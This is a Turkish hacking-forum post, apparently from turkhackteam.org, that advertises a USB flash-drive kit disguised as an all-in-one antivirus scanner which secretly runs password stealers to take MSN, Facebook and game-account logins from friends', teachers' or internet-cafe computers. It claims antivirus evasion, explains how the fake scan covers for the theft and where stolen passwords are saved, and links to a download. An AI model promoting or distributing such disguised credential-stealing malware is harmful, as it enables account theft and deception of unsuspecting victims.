Türkiyede İlk USB Flash Dİskten MSn FACEbook vs... Tüm siteleri çalmak

by mufettis

Uzman üye
25 Ocak 2010
1,132
0
X* Özel Harekât *X
Arkadaşlar öncelikle bu yöntem usb diskiniz için geliştirilmiştir ben bu yöntemi yabancı bi sitede gördüm ve birz geliştirdim sizler için editlemeler yaptım ve de mükemmel oldu.Bu yöntem hiçbir anti tarafından tanınmaz ve sonsuza kadar fuddur !!
biggrin.gif
biggrin.gif
. Programları combofixle destekledimki kurban çakmasın.Şimdi verceğim dosyaları usb flash diskinizin içine oldugu gibi atıcaksınız.Klasör açmayın oldugu gibi atın.Sonra otomatik çalıştıra basın perform virus scana basın, arkadaşanıza yada öğretmeninizde olabilir tüm antivirüslerin bir arada oldugu bi program buldum usb den çalışıyor en son ise combofix çalışcak ve 10 12 dakika sürecek diğer programlar ise şifre çalıcılarımız.SOnra işimiz bitince flashı çıkartın şifreler kaspersky.txt,nod32.txt vs.. bunların içinde olcak.Bu yöntemle birçok internet cafede oyun çarları soyabilirsiniz ve de facebook ele geçirebilirsiniz.


https://tik.lat/rRfB7
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.